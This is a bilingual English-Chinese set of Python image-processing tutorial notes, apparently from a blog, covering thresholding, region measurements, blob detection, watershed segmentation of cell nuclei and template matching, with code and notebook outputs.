    time= 0 hr   Scratch area= 6768.765 um²time= 1 hr   Scratch area= 5605.807500000001 um²time= 2 hr   Scratch area= 4881.465 um²time= 3 hr   Scratch area= 4277.4075 um²time= 4 hr   Scratch area= 3742.4025 um²time= 5 hr   Scratch area= 3261.2625000000003 um²time= 6 hr   Scratch area= 2919.4425 um²time= 7 hr   Scratch area= 2575.1925 um²time= 8 hr   Scratch area= 2218.7925 um²time= 9 hr   Scratch area= 1890.7425 um²
    plt.plot(time_list, area_list, 'bo')  # Print blue dots scatter plot
    [<matplotlib.lines.Line2D at 0x295b35d21c0>]

    png

    • Print slope, intercept

      • 打印斜率、截距
    from scipy.stats import linregress  # Linear regression

    slope, intercept, r_value, p_value, std_err = linregress(time_list, area_list)
    print("y = ",slope, "x", " + ", intercept)
    print("R\N{SUPERSCRIPT TWO} = ", r_value ** 2)
    y =  -507.25881818181824 x  +  6096.792681818182R² =  0.9568904267126052

    Tutorial 55 - Image segmentation followed by measurements- in python

    from skimage import measure, io, img_as_ubyte
    import matplotlib.pyplot as plt
    from skimage.color import label2rgb, rgb2gray
    import numpy as np
    import cv2
    image = img_as_ubyte(rgb2gray(io.imread('images/cast_iron1.tif')))
    scale = 0.6
    plt.imshow(image, cmap='gray')
    <matplotlib.image.AxesImage at 0x200892d89a0>

    png

    plt.hist(image.flat, bins=100, range=(0, 255))
    (array([    0.,    46.,   479.,  1449.,   966.,  1498.,  1081.,  1901.,         1408.,  2200.,  2605.,  1816.,  2434.,  1382.,  1474.,   686.,          719.,   387.,   439.,   275.,   322.,   311.,   195.,   347.,          197.,   305.,   191.,   297.,   193.,   303.,   315.,   169.,          300.,   173.,   331.,   239.,   344.,   234.,   409.,   271.,          467.,   435.,   337.,   569.,   420.,   744.,   545.,   906.,          747.,  1251.,  1509.,  1195.,  2163.,  1900.,  3508.,  3022.,         5913.,  5444., 11870., 11205., 25793., 40120., 29310., 32387.,         8740.,  1102.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    from skimage.filters import threshold_otsu
    threshold = threshold_otsu(image)
    threshold
    93
    # Generate thresholded image
    thresholded_img = image < threshold
    plt.imshow(thresholded_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x20089b28760>

    png

    # Remove edge touching regions
    from skimage.segmentation import clear_border

    edge_touching_removed = clear_border(thresholded_img)
    plt.imshow(edge_touching_removed, cmap='gray')
    <matplotlib.image.AxesImage at 0x20089c39ca0>

    png

    • Label connected regions of an integer array using measure.label

      • 使用measure.label标记整数数组中已连接的区域
    • Labels each connected entity as one object

      • 将每个连接的实体标记为一个对象
    • Connectivity = Maximum number of orthogonal hops to consider a pixel/voxel as a neighbor.

      • 连通性 = 将像素 / 体素视为邻居的最大正交跳数。
    • If None, a full connectivity of input.ndim is used, number of dimensions of the image

      • 如果为None,则表示输入的完全连通性。
    • For 2D image it would be 2

      • 对于2D图像,它将是2
    label_image = measure.label(edge_touching_removed, connectivity=image.ndim)
    plt.imshow(label_image)
    <matplotlib.image.AxesImage at 0x20089c9dbb0>

    png

    • Return an RGB image where color-coded labels are painted over the image.

      • 返回一个RGB图像,其中颜色编码的标签涂在图像上。
    • Using label2rgb

    image_label_overlay = label2rgb(label_image, image=image)
    plt.imshow(image_label_overlay)
    <matplotlib.image.AxesImage at 0x20089d0a8e0>

    png

    #################################################
    # Calculate properties
    # Using regionprops or regionprops_table
    all_props = measure.regionprops(label_image, image)
    # Can print various parameters for all objects
    for prop in all_props:
    print('Label: {} Area: {}'.format(prop.label, prop.area))
    • Compute image properties and return them as a pandas-compatible table.

      • 计算映像属性并将它们作为与pandas兼容的表返回。
    • Available regionprops: area, bbox, centroid, convex_area, coords, eccentricity, equivalent diameter, euler number, label, intensity image, major axis length, max intensity, mean intensity, moments, orientation, perimeter, solidity, and many more

      • 可用的区域:面积,bbox,质心,凸面积,坐标,偏心,等效直径,欧拉数,标签,强度图像,主轴长度,最大强度,平均强度,力矩,方向,周长,固体,和许多
    props = measure.regionprops_table(label_image, image, 
    properties=['label',
    'area', 'equivalent_diameter',
    'mean_intensity', 'solidity'])
    import pandas as pd
    df = pd.DataFrame(props)
    df.head()
    label area equivalent_diameter mean_intensity solidity
    0 1 1 1.128379 92.000000 1.000000
    1 2 587 27.338464 19.701874 0.956026
    2 3 1 1.128379 83.000000 1.000000
    3 4 40 7.136496 64.625000 0.701754
    4 5 1 1.128379 91.000000 1.000000
    # To delete small regions...
    df = df[df['area'] > 50]
    df.head()
    label area equivalent_diameter mean_intensity solidity
    1 2 587 27.338464 19.701874 0.956026
    8 9 366 21.587165 32.696721 0.963158
    11 12 226 16.963258 32.787611 0.945607
    15 16 71 9.507892 49.253521 0.934211
    16 17 220 16.736568 28.759091 0.897959

    Convert to micron scale

    df['area_sq_microns'] = df['area'] * (scale ** 2)
    df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (scale)
    df.head()
    label area equivalent_diameter mean_intensity solidity area_sq_microns equivalent_diameter_microns
    1 2 587 27.338464 19.701874 0.956026 211.32 16.403078
    8 9 366 21.587165 32.696721 0.963158 131.76 12.952299
    11 12 226 16.963258 32.787611 0.945607 81.36 10.177955
    15 16 71 9.507892 49.253521 0.934211 25.56 5.704735
    16 17 220 16.736568 28.759091 0.897959 79.20 10.041941
    df.to_csv('data/cast_iron_measurements.csv')

    Tutorial 56 - Blob Detector for segmentation based on feature properties -in python-

    blob_百度百科 (baidu.com)

    ​ 计算机视觉中的Blob是指图像中的一块连通区域,Blob分析就是对前景/背景分离后的二值图像,进行连通域提取和标记。标记完成的每一个Blob都代表一个前景目标,然后就可以计算Blob的一些相关特征。其优点在于通过Blob提取,可以获得相关区域的信息,但是速度较慢,分析难度大。

    https://www.learnopencv.com/blob-detection-using-opencv-python-c/

    • BLOB stands for Binary Large OBject and refers to a group of connected pixels in a binary image.

      • BLOB代表二进制大对象,指的是二值图像中一组相互连接的像素。
    • A Blob is a group of connected pixels in an image that share some common property ( E.g grayscale value ).

      • Blob是一组在图像中具有某种共同属性(如灰度值)的相互连接的像素。
    • In the image above, the dark connected regions are blobs,
      and the goal of blob detection is to identify and mark these regions.

      • 在上图中,暗连接的区域是斑点,斑点检测的目标是识别和标记这些区域。

    How it works:

    • Threshold input images to binary.

      • 阈值输入图像为二值。
    • Grouping: connected white/black pixels are grouped together.

      • 分组:连接的白色/黑色像素分组在一起。
    • Merging: blobs located closer than minDistBetweenBlobs are merged.

      • 合并:位于比minDistBetweenBlobs更近的blobs被合并。
    • Center & Radius Calculation : The centers and radii of the new merged blobs are computed and returned.

      • 中心和半径计算:计算并返回新合并blobs的中心和半径。

    • Can be filtered by color, size or shape
      • 可以根据颜色、大小或形状过滤
    import matplotlib.pyplot as plt
    import numpy as np
    import cv2
    image = cv2.imread('images/cast_iron1.tif', 0)
    • Set up the SimpleBlobdetector with default parameters.
      • 使用默认参数设置 SimpleBlobdetector。
    params = cv2.SimpleBlobDetector_Params()
    • Define thresholds
      • 定义阈值

    Can define thresholdStep. See documentation.

    params.minThreshold = 0
    params.maxThreshold = 255
    • Filter by Area.
      • 按面积过滤。
    params.filterByArea = True
    params.minArea = 50
    params.maxArea = 10000
    • Filter by Color (black=0)
      • 按颜色过滤
    params.filterByColor = False  #Set true for cast_iron as we'll be detecting black regions
    params.blobColor = 0
    • Filter by Circularity
      • 圆度过滤器
    params.filterByCircularity = True
    params.minCircularity = 0.5
    params.maxCircularity = 1
    • Filter by Convexity
      • 通过凸性过滤器
    params.filterByConvexity = True
    params.minConvexity = 0.5
    params.maxConvexity = 1
    • Filter by InertiaRatio
      • 通过惯性系数过滤器
    params.filterByInertia = True
    params.minInertiaRatio = 0
    params.maxInertiaRatio = 1
    • Distance Between Blobs
      • Blobs 之间的距离
    params.minDistBetweenBlobs = 0
    • Setup the detector with parameters
      • 用参数设置探测器
    detector = cv2.SimpleBlobDetector_create(params)
    • Detect blobs
      • 检测 blobs
    keypoints = detector.detect(image)
    print("Number of blobs detected are : ", len(keypoints))
    Number of blobs detected are :  82
    • Draw blobs
      • 绘制 blobs
    img_with_blobs = cv2.drawKeypoints(image, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
    plt.imshow(img_with_blobs)
    <matplotlib.image.AxesImage at 0x2b46aa494f0>

    png

    Tutorial 57 - Nuclei -cell- segmentation in python using watershed

    What is watershed? 什么是分水岭?

    • Any grayscale image can be viewed as a topographic surface where high intensity denotes hills and low intensity denotes valleys.
      • 任何灰度图像都可以看作是一个地形表面,其中高强度表示丘陵,低强度表示山谷。

    png

    • With watershed, we start filling every valleys with different colored water (labels).

      • 有了分水岭,我们开始用不同颜色的水(标签)填充每个山谷。
    • As the water rises, water from different valleys will start to merge.

      • 随着水位上升,来自不同山谷的水开始融合。
    • To avoid that, we build barriers in the locations where water merges.

      • 为了避免这种情况,我们在水汇合处建造了屏障。
    • Continue filling water and building barriers until all the peaks are under water.

      • 继续填水和建造屏障,直到所有的山峰都在水下。
    • The barriers will give us the segmentation result.

      • 屏障会给我们分割的结果。

    png

    • To minimize over-segmentation due to noise in the image, OpenCV implemented a marker-based watershedalgorithm.
      • 为了减少图像中噪声引起的过分割,OpenCV 实现了一种基于标记的分水岭算法。
    • We specify all valley points to be merged and also the ones not to be merged.
      • 我们指定所有要合并的谷点和不合并的谷点。
    • We first label the regions that we are sure of being the foreground (or object of interest) with one color.
      • 我们首先用一种颜色标记我们确定是前景(或感兴趣的对象)的区域。
    • Then label the regions that we are sure of being background or non-object with another color.
      • 然后用另一种颜色标记我们确定为背景或非物体的区域。
    • And, for unsure regions in between, label them with 0.
      • 对于中间的不确定区域,用 0 标记它们。
    • This process creates the marker.
      • 这个过程创建了标记。
    • Now apply watershed algorithm.
      • 现在应用分水岭算法。
    • The marker will be updated with the labels we provided, and the boundaries of objects will have a value of -1.
      • 标记将更新为我们提供的标签,对象的边界将有一个-1 的值。

    https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_imgproc/py_watershed/py_watershed.html


    • This code performs cell counting and size distribution analysis and dumps results into a csv file.

      • 此代码执行单元格计数和大小分布分析,并将结果转储到csv文件中。
    • It uses watershed segmentation for better segmentation, separating touching nuclei.

      • 它使用分水岭分割来更好的分割,分离接触的核。
    import cv2
    import numpy as np
    from matplotlib import pyplot as plt
    from scipy import ndimage
    from skimage import measure, color, io
    img = cv2.imread('images/Osteosarcoma_01.tif')
    • Extract only blue channel as DAPI / nuclear (blue) staining is the best channel to perform cell count.

      • 只提取蓝色通道,因为DAPI /核(蓝色)染色是进行细胞计数的最佳通道。
    • Blue channel. Image equivalent to grey image.

      • 蓝色通道。图像相当于灰色图像。
    cells = img[:, :, 0]
    plt.imshow(cells, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36b074850>

    png

    • 1 pixel = 454 nm (got this from the metadata of original image)

      • 1像素 = 454 nm(来自原始图像的元数据)
    pixels_to_um = 0.454

    STEP 1: Thresholded image for nuclei 核的阈值图像

    • Threshold image to binary using OTSU. ALl thresholded pixels will be set to 255
      • 阈值图像的二值化使用 OTSU。所有阈值像素将被设置为255
    ret1, thresh = cv2.threshold(cells, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    plt.imshow(thresh, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36b181f10>

    png

    • Morphological operations to remove small noise - opening

      • 形态学运算去除开孔小噪声
    • To remove holes we can use closing

      • 要去除小孔,我们可以用闭合法
    kernel = np.ones((3,3),np.uint8)
    opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)

    from skimage.segmentation import clear_border
    opening = clear_border(opening) # Remove edge touching grains
    plt.imshow(opening, cmap='gray') # This is our image to be segmented further using watershed
    <matplotlib.image.AxesImage at 0x2b36bd0d6d0>

    png

    • Check the total regions found before and after applying this.
      • 检查应用此方法前后找到的区域总数。

    STEP 2: Sude background

    • Now we know that the regions at the center of cells is for sure cells

      • 现在我们知道细胞中心的区域是确定的细胞
    • The region far away is background.

      • 远处的区域是背景。
    • We need to extract sure regions. For that erode a few times.

      • 我们需要提取确定的区域。因为腐蚀了几次。
    • But we have cells touching, so erode alone will not work.

      • 但我们有细胞接触,所以单独腐蚀是不起作用的。
    • To separate touching objects, the best approach would be distance transform and then thresholding.

      • 要分离接触物体,最好的方法是先进行距离变换,再进行阈值分割。
    • let us start by identifying sure background area dilating pixes a few times increases cell boundary to background.

      • 让我们从确定背景区域开始,将像素放大几倍,以增加背景的细胞边界。
    • This way whatever is remaining for sure will be background.

      • 这样,任何可以确定的东西都将成为背景。
    • The area in between sure background and foreground is our ambiguous area.

      • 在确定的背景和前景之间的区域是我们的模糊区域。
    • Watershed should find this area for us.

      • 分水岭应该帮我们找到这片区域。
    sure_bg = cv2.dilate(opening,kernel,iterations=10)
    plt.imshow(sure_bg, cmap='gray') # Dark region is our sure background
    <matplotlib.image.AxesImage at 0x2b36c5b2ac0>

    png

    • Finding sure foreground area using distance transform and thresholding intensities of the points inside the foreground regions are changed to distance their respective distances from the closest 0 value (boundary).

      • 利用距离变换找到确定的前景区域,并将前景区域内点的阈值强度变化为它们各自距离最近的0值(边界)的距离。

    https://www.tutorialspoint.com/opencv/opencv_distance_transformation.htm

    dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)
    plt.imshow(dist_transform, cmap='gray') # Dist transformed img.
    <matplotlib.image.AxesImage at 0x2b36bd55d00>

    png

    • Let us threshold the dist transform by starting at 1/2 its max value.

      • 让我们从dist变换的最大值的1/2开始阈值。
    print(dist_transform.max())  # gives about 21.9
    21.968996
    ret2, sure_fg = cv2.threshold(dist_transform,0.5*dist_transform.max(),255,0)
    plt.imshow(sure_fg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36bdc25e0>

    png

    STEP 3: Unknown

    • Later you realize that 0.25 * max value will not separate the cells well.

      • 后来你意识到0.25 * max值不能很好地分离单元格。
    • High value like 0.7 will not recognize some cells. 0.5 seems to be a good compromize

      • 像0.7这样的高值将无法识别某些单元格。0.5似乎是一个很好的折衷方案
    • Unknown ambiguous region is nothing but bkground - foreground

      • 未知的模糊区域不过是背景-前景
    sure_fg = np.uint8(sure_fg)  # Convert to uint8 from float
    unknown = cv2.subtract(sure_bg,sure_fg)
    plt.imshow(unknown, cmap='gray')
    <matplotlib.image.AxesImage at 0x2b36be24c10>

    png

    STEP 4: Markers

    • Now we create a marker and label the regions inside.

      • 现在我们创建一个标记,并标记里面的区域。
    • For sure regions, both foreground and background will be labeled with positive numbers.

      • 对于确定的区域,前景和背景都将被标记为正数。
    • Unknown regions will be labeled 0.

      • 未知区域将被标记为0。
    • For markers let us use ConnectedComponents.

      • 对于标记,让我们使用ConnectedComponents
    • Connected components labeling scans an image and groups its pixels into components based on pixel connectivity, i.e. all pixels in a connected component share similar pixel intensity values and are in some way connected with each other.

      • 连接组件标签扫描图像,并根据像素连接性将其像素分组,即连接组件中的所有像素共享相似的像素强度值,并以某种方式相互连接。
    • Once all groups have been determined, each pixel is labeled with a graylevel or a color (color labeling) according to the component it was assigned to.

      • 一旦确定了所有的组,每个像素将根据分配给它的组件用灰度或颜色(颜色标记)标记。
    ret3, markers = cv2.connectedComponents(sure_fg)
    plt.imshow(markers)
    <matplotlib.image.AxesImage at 0x2b36d8060a0>

    png

    • One problem rightnow is that the entire background pixels is given value 0.

      • 现在的一个问题是,整个背景像素的值是0。
    • This means watershed considers this region as unknown.

      • 这意味着watershed认为这个区域是未知的。
    • So let us add 10 to all labels so that sure background is not 0, but 10

      • 所以让我们给所有标签加上10,这样确定的背景不是0,而是10
    markers = markers + 10
    • Now, mark the region of unknown with zero
      • 现在,用零标记未知区域
    markers[unknown==255] = 0
    plt.imshow(markers, cmap='jet') # Look at the 3 distinct regions.
    <matplotlib.image.AxesImage at 0x2b36d8f51c0>

    png

    • Now we are ready for watershed filling.

      • 现在我们已经准备好进行流域注水了。
    markers = cv2.watershed(img,markers)
    • Let us color boundaries in yellow.

      • 让我们用黄色标记边界。
    • Remember that watershed assigns boundaries a value of -1

      • 记住,分水岭的边界值是-1
    img[markers == -1] = [0,255,255]  
    • label2rgb - Return an RGB image where color-coded labels are painted over the image.
      • label2rgb -返回一个RGB图像,其中彩色编码的标签涂在图像上。
    img2 = color.label2rgb(markers, bg_label=0)
    plt.imshow(img2)
    <matplotlib.image.AxesImage at 0x2b36d9c4970>

    png

    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2b36da2de50>

    png

    • Now, time to extract properties of detected cells

      • 现在,是时候提取检测到的细胞的属性了
    • Directly capturing props to pandas dataframe

      • 直接捕捉pandas dataframe
    props = measure.regionprops_table(markers, cells, 
    properties=['label',
    'area', 'equivalent_diameter',
    'mean_intensity', 'solidity', 'orientation',
    'perimeter'])

    import pandas as pd
    df = pd.DataFrame(props)
    df.head()
    label area equivalent_diameter mean_intensity solidity orientation perimeter
    0 10 1400327 1335.272149 4.860480 0.924828 -1.499676 18900.592991
    1 11 1092 37.287767 80.092491 0.923858 1.282415 138.953319
    2 12 1142 38.131871 151.830998 0.955649 0.670516 132.296465
    3 13 1108 37.559944 78.256318 0.891392 -1.062275 146.852814
    4 14 1670 46.111929 106.720359 0.862603 1.532047 188.823376
    • To delete small regions…
      • 删除较小区域…
    df = df[df['area'] > 50]
    df.head()
    label area equivalent_diameter mean_intensity solidity orientation perimeter
    0 10 1400327 1335.272149 4.860480 0.924828 -1.499676 18900.592991
    1 11 1092 37.287767 80.092491 0.923858 1.282415 138.953319
    2 12 1142 38.131871 151.830998 0.955649 0.670516 132.296465
    3 13 1108 37.559944 78.256318 0.891392 -1.062275 146.852814
    4 14 1670 46.111929 106.720359 0.862603 1.532047 188.823376
    • Convert to micron scale
      • 转换成微米级
    df['area_sq_microns'] = df['area'] * (pixels_to_um ** 2)
    df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (pixels_to_um)
    df.head()
    label area equivalent_diameter mean_intensity solidity orientation perimeter area_sq_microns equivalent_diameter_microns
    0 10 1400327 1335.272149 4.860480 0.924828 -1.499676 18900.592991 288629.799932 606.213556
    1 11 1092 37.287767 80.092491 0.923858 1.282415 138.953319 225.078672 16.928646
    2 12 1142 38.131871 151.830998 0.955649 0.670516 132.296465 235.384472 17.311869
    3 13 1108 37.559944 78.256318 0.891392 -1.062275 146.852814 228.376528 17.052215
    4 14 1670 46.111929 106.720359 0.862603 1.532047 188.823376 344.213720 20.934816

    Tutorial 58 - Object detection using template matching

    Template Matching 模式匹配

    OpenCV: Template Matching

    OBJECT DETECTION WITH TEMPLATES

    • Need a source image and a template image.

      • 需要一个源图像和一个模板图像。
    • The template image T is slided over the source image (as in 2D convolution), and the program tries to find matches using statistics.

      • 模板图像T在源图像上滑动(在2D卷积中),程序尝试使用统计信息找到匹配。
    • Several comparison methods are implemented in OpenCV.

      • OpenCV中实现了几种比较方法。
    • It returns a grayscale image, where each pixel denotes how much does the neighbourhood of that pixel match with template.

      • 它返回一个灰度图像,其中每个像素表示该像素的邻域与模板的匹配程度。
    • Once you got the result, you can use cv2.minMaxLoc() function to find where is the maximum/minimum value. Take it as the top-left corner of the rectangle and take (w,h) as width and height of the rectangle.

      • 得到结果后,可以使用cv2.minMaxLoc()函数来查找最大值/最小值的位置。
        将其作为矩形的左上角,并将(w,h)作为矩形的宽和高。
    • That rectangle can be drawn on the region of matched template.

      • 该矩形可以绘制在匹配模板的区域上。

    • Template matching, single object in an image.

      • 模板匹配,图像中单个对象。
    • Multiple methods to see which one works best.

      • 多种方法,看看哪一种效果最好。
    import cv2
    import numpy as np
    import matplotlib.pyplot as plt
    img_rgb = cv2.imread('images/Ti_powder.tif')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    plt.imshow(img_gray, cmap='gray')
    <matplotlib.image.AxesImage at 0x263a924c550>

    png

    template = cv2.imread('images/Ti_powder_single.tif', 0)
    plt.imshow(template, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae0a4be0>

    png

    h, w = template.shape[::]
    h, w
    (18, 16)
    • For TM_SQDIFF, Good match yields minimum value; bad match yields large values

      • 对于 TM_SQDIFF,良好匹配产生最小值; 不匹配会产生较大的值
    • For all others it is exactly opposite, max value = good fit.

      • 对于所有其他的情况,情况正好相反,最大值 = 良好的适合度。
    # methods available: ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
    # 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
    res = cv2.matchTemplate(img_gray, template, cv2.TM_SQDIFF)
    plt.imshow(res, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae0ff8e0>

    png

    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
    min_val, max_val, min_loc, max_loc
    (4.0, 7702931.0, (318, 418), (66, 407))
    # Change to max_loc for all excerpt for TM_SQDIFF
    # 将除 TM_SQDIFF 外的所有数据更改为 max_loc
    top_left = min_loc
    bottom_right = (top_left[0] + w, top_left[1] + h)

    # Black rectangle with thickness 2.
    # 绘制厚度为 2 的黑色矩形。
    cv2.rectangle(img_gray, top_left, bottom_right, 0, 1)

    plt.imshow(img_gray, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae4de220>

    png


    Template matching - multiple objects

    • For multiple occurances, cv2.minMaxLoc() won’t give all the locations

      • 对于多次出现,cv2.minMaxLoc()不会给出所有的位置
    • So we need to set a threshold

      • 所以我们需要设置一个阈值
    import cv2
    import numpy as np
    from matplotlib import pyplot as plt

    img_rgb = cv2.imread('images/Ti_powder.tif')
    img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
    template = cv2.imread('images/Ti_powder_single.tif',0)
    h, w = template.shape[::]

    res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
    plt.imshow(res, cmap='gray')
    <matplotlib.image.AxesImage at 0x263ae67ac40>

    png

    # Pick only values above 0.8. For TM_CCOEFF_NORMED, larger values = good fit.
    # 只选择高于0.8的值。对于TM_CCOEFF_NORMED,较大的值=良好的拟合。
    threshold = 0.8

    loc = np.where( res >= threshold)
    # Outputs 2 arrays. Combine these arrays to get x,y coordinates - take x from one array and y from the other.
    # 输出2个数组。组合这些数组得到x,y坐标——从一个数组取x,从另一个数组取y。

    # Reminder: ZIP function is an iterator of tuples where first item in each iterator is paired together, then the second item and then third, etc.
    # 提醒:ZIP函数是一个元组迭代器,其中每个迭代器中的第一个项配对在一起,然后是第二个项,然后是第三个,等等。

    for pt in zip(*loc[::-1]): # -1 to swap the values as we assign x and y coordinate to draw the rectangle. -1来交换我们分配的x和y坐标来绘制矩形的值。
    # Draw rectangle around each object. We know the top left (pt), draw rectangle to match the size of the template image. 在每个物体周围画一个矩形。我们知道左上角(pt),绘制矩形以匹配模板图像的大小。
    cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 1) # Red rectangles with thickness 2.
    plt.imshow(img_rgb)
    <matplotlib.image.AxesImage at 0x263a957fc10>

    png

    ]]>
    + 正文

    Tutorial 51 - What is image thresholding and segmentation

    What is image segmentation? 什么是图像分割?

    And how is it different than thresholding? 它和阈值法有什么不同?

    Image segmentation is the process of partitioning a digital image into multiple segments(image objects).

    • 图像分割是将一幅数字图像分割成多个段(图像对象)的过程。

    Image thresholding is a simple form of image segmentation, it is a way to create a binary image based on setting a threshold value on the pixel intensity of the original image.

    • 图像阈值分割是图像分割的一种简单形式,它是在原始图像的像素强度上设置一个阈值的基础上创建一个二值图像的方法。

    png

    OpenCV —— 阈值分割(直方图技术法,熵算法,Otsu,自适应阈值算法)

    1
    2
    3
    4
    5
    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread("images/Osteosarcoma_01.tif", 1)
    plt.imshow(img[:,:,::-1])
    <matplotlib.image.AxesImage at 0x15586e075e0>

    png

    • Separate blue channels as they contain nuclei pixels (DAPI).
      • 分开蓝色通道,因为它们包含核像素(DAPI)。
    1
    2
    blue_channel = img[:,:,0]
    plt.imshow(blue_channel, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c6bc29a60>

    png

    1
    plt.hist(blue_channel.flat, bins=100, range=(0, 120))
    (array([8.12033e+05, 3.47050e+04, 2.10950e+04, 3.48210e+04, 4.78370e+04,        1.07928e+05, 5.22380e+04, 4.82100e+04, 4.30030e+04, 3.66300e+04,        5.45780e+04, 2.04160e+04, 1.62930e+04, 1.28170e+04, 1.05070e+04,        1.52520e+04, 5.43100e+03, 4.38900e+03, 3.60500e+03, 2.90800e+03,        4.45800e+03, 1.71800e+03, 1.54000e+03, 1.34400e+03, 1.21900e+03,        2.06400e+03, 9.29000e+02, 8.15000e+02, 8.25000e+02, 7.36000e+02,        1.44100e+03, 6.95000e+02, 6.53000e+02, 6.37000e+02, 6.56000e+02,        1.30700e+03, 6.35000e+02, 6.70000e+02, 6.42000e+02, 6.53000e+02,        1.44100e+03, 7.63000e+02, 7.41000e+02, 8.87000e+02, 8.89000e+02,        1.84300e+03, 1.05800e+03, 1.03700e+03, 1.06800e+03, 1.09200e+03,        2.30900e+03, 1.16800e+03, 1.22000e+03, 1.28600e+03, 1.33500e+03,        2.73900e+03, 1.33800e+03, 1.43900e+03, 1.44000e+03, 1.51700e+03,        2.97600e+03, 1.54400e+03, 1.50600e+03, 1.54700e+03, 1.53600e+03,        3.21800e+03, 1.54400e+03, 1.64800e+03, 1.61200e+03, 1.61200e+03,        3.08900e+03, 1.53400e+03, 1.50400e+03, 1.53300e+03, 1.50700e+03,        2.88000e+03, 1.45900e+03, 1.38300e+03, 1.37400e+03, 1.38100e+03,        2.67000e+03, 1.33800e+03, 1.24400e+03, 1.22500e+03, 1.16200e+03,        2.38500e+03, 1.17100e+03, 1.13000e+03, 1.08200e+03, 1.04700e+03,        2.03100e+03, 1.03800e+03, 9.89000e+02, 9.92000e+02, 8.93000e+02,        1.78600e+03, 8.82000e+02, 7.94000e+02, 7.79000e+02, 1.52600e+03]), array([  0. ,   1.2,   2.4,   3.6,   4.8,   6. ,   7.2,   8.4,   9.6,         10.8,  12. ,  13.2,  14.4,  15.6,  16.8,  18. ,  19.2,  20.4,         21.6,  22.8,  24. ,  25.2,  26.4,  27.6,  28.8,  30. ,  31.2,         32.4,  33.6,  34.8,  36. ,  37.2,  38.4,  39.6,  40.8,  42. ,         43.2,  44.4,  45.6,  46.8,  48. ,  49.2,  50.4,  51.6,  52.8,         54. ,  55.2,  56.4,  57.6,  58.8,  60. ,  61.2,  62.4,  63.6,         64.8,  66. ,  67.2,  68.4,  69.6,  70.8,  72. ,  73.2,  74.4,         75.6,  76.8,  78. ,  79.2,  80.4,  81.6,  82.8,  84. ,  85.2,         86.4,  87.6,  88.8,  90. ,  91.2,  92.4,  93.6,  94.8,  96. ,         97.2,  98.4,  99.6, 100.8, 102. , 103.2, 104.4, 105.6, 106.8,        108. , 109.2, 110.4, 111.6, 112.8, 114. , 115.2, 116.4, 117.6,        118.8, 120. ]), <BarContainer object of 100 artists>)

    png

    • Manual thresholding by setting threshold value to numpy array
      • 手动设置阈值
    • After thresholding we will get a binary image.
      • 阈值化后得到二值图像。
    1
    2
    3
    background = (blue_channel <= 40)
    nuclei = (blue_channel > 40)
    plt.imshow(nuclei, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c6bb277f0>

    png

    • Using opencv to perform manual threshold
      • 使用 opencv 执行手动阈值
    • All pixels above 40 will have pixel value 255
      • 所有高于 40 的像素的像素值都是 255
    • Should be exactly same as the above method.
      • 应该与上面的方法完全相同。
    1
    2
    ret1, thresh1 = cv2.threshold(blue_channel, 40, 255, cv2.THRESH_BINARY)
    ret1, thresh1
    (40.0, array([[255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        ...,        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0]], dtype=uint8))
    1
    plt.imshow(thresh1, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c00133220>

    png

    AUTO using OTSU

    • Using opencv for otsu based automatic thresholding
      • 使用 opencv 进行基于 otsu 的自动阈值分割
    • Reports a value of 50 as threshold for the nuclei.
